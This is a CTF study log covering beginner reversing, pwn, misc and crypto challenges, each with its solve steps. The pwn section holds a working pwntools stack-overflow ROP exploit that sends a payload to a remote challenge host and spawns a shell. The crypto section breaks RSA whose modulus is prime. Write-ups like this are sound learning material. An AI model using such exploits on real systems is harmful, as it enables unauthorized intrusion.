1.26 Study Log
re
[HDCTF 2023]easy_re
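After getting the attachment, check for a packer first: it is packed with UPX. Unpack it on Kali, then open it in IDA and locate the main function. The decompiled function compares the encrypted string s with a, so we need to find the encryption method and the ciphertext. The encryption turns out to be base64 with no custom alphabet, so just decode it in CyberChef.
[SWPUCTF 2021 Freshman Competition] 简简单单的逻辑 (Simple Logic)
The challenge is a .py file. Looking at the encryption: for each element list[i] of the list `list`, a bitwise operation is applied. list[i] shifted right by 4 bits is added to list[i] ANDed with 15 (hexadecimal 0xf) and shifted left by 4 bits, which gives a new value key. The ASCII code of the i-th character of the flag string is XORed with key, the result is converted to a hexadecimal string, the 0x prefix is removed, zfill(2) pads the string to length 2, and it is appended to the result string.
To decrypt, run this code in reverse: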
# The known encrypted result
result = 'bcfba4d0038d48bd4b00f82796d393dfec'
# Convert the hex string to a byte array
encrypted_bytes = bytes.fromhex(result)
# Key list
list = [47, 138, 127, 57, 117, 188, 51, 143, 17, 84, 42, 135, 76, 105, 28, 169, 25]
# Start with an empty string to hold the decrypted flag
flag = ''
# Walk over each byte and its corresponding key
for i in range(len(encrypted_bytes)):
    key = (list[i] >> 4) + ((list[i] & 0xf) << 4)
    # XOR each byte with the key to recover the original character
    decrypted_char = chr(encrypted_bytes[i] ^ key)
    flag += decrypted_char
print(flag)
pwn
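basectf2024 我把她丢了 (I Lost Her)
From the challenge description this is a stack overflow. The file is an ELF; open it in IDA and find the main function. The read call reads more bytes than the buffer can store, so there is a stack overflow. The bin/sh function was also found, and that is the way in.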
exp:
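from pwn import *
# io=process('./pwn')  # local run; disabled so that io is only the remote connection
io=remote("gz.imxbt.cn",20389)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
# 0x70+8 bytes of padding, then pop_rdi, binsh, ret and system in that order
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()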
misc
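basectf2024 海上遇到了鲨鱼 (Met a Shark at Sea)
This challenge provides a pcapng file, which is a packet capture. Start by following the streams.
No flag turned up in the TCP streams.
Following the HTTP stream then reveals the flag; it only needs to be reversed.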
s="}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"  # the string to reverse
reversed_s=s[::-1]
print(reversed_s)
crypto
basectf2024 babyrsa
A fairly basic RSA challenge. The task is as follows:
from Crypto.Util.number import *
flag=b'BaseCTF{}'
m=bytes_to_long(flag)
n=getPrime(1024)
e=65537
c=pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""
exp:
from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
# n comes from getPrime(1024), so n itself is prime and phi(n) = n - 1
phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))
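Why `phin = n-1` works in the exp above, as an added example that is not part of the original writeup or the challenge: the task builds n with getPrime(1024), so n is prime and the private exponent follows from public values alone. The check below flags such a modulus; the function names and the small sample values are constructed for illustration.

```python
import random

def is_probable_prime(n, rounds=40):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    # Write n - 1 as d * 2**r with d odd.
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True

def audit_modulus(n, e):
    """Return d if n is prime (the key is broken), otherwise None."""
    if not is_probable_prime(n):
        return None
    # For prime n, phi(n) = n - 1, so d needs no factoring at all.
    return pow(e, -1, n - 1)

def roundtrip(n, e, m):
    """Encrypt m, then decrypt it with the d recovered by audit_modulus."""
    d = audit_modulus(n, e)
    if d is None:
        return None
    return pow(pow(m, e, n), d, n)

# Constructed sample values (hypothetical, not taken from the challenge).
E = 65537
PRIME_N = 2**127 - 1                      # a prime used as the "modulus"
COMPOSITE_N = (2**61 - 1) * (2**89 - 1)   # product of two primes, as RSA intends
MSG = int.from_bytes(b"constructed", "big")

if __name__ == "__main__":
    print(roundtrip(PRIME_N, E, MSG) == MSG)   # prime modulus: plaintext recovered
    print(audit_modulus(COMPOSITE_N, E))       # proper modulus: nothing recovered
```

A key-generation or key-import path can run the same primality check on n and reject the key when it passes.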